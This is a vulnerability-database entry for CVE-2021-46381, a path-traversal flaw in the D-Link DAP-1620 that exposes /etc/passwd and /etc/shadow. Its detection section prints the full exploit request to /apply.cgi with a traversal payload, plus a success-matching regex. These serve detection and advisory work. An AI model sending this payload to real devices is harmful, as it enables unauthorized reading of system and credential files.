CVE-2021-46381
published 2022-03-04

CVE-2021-46381: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].

Priority: P1 80 high
CVSS 3.1: 7.5
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ITW EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 57.98% (99.0th percentile)

Detection & IOCs (extracted from sources)

url: /apply.cgi
command: action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass
path: ../../../../../../../../../../../../../../etc/passwd
yara regex: root:.*:0:0:
bytes: 490a0046304402202af690770e9006f89e4de84567b484857812d481914449434b5245491daa68e202207f835a7d797095a8e3434d1cb6bf9526da49ff2771af10273bf0307896894b58:922c64590222798bb761d5b6d8e72950
  • The exploit targets POST /apply.cgi with action=do_graph_auth and a path-traversal sequence in the html_response_page parameter to read /etc/passwd or /etc/shadow.
  • Successful exploitation returns content matching 'root:.*:0:0:' in the HTTP response body, indicating that /etc/passwd was read.
  • Monitor for POST requests to /apply.cgi whose html_response_page parameter contains '../' sequences and targets /etc/passwd or /etc/shadow.
  • The exploit was tested specifically against the D-Link DAP-1620 A1 hardware revision running firmware v1.01; other revisions or firmware versions may not be vulnerable.

CVSS provenance

nvd v3.1: 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd v2.0: 5.0 MEDIUM AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck: 7.5 HIGH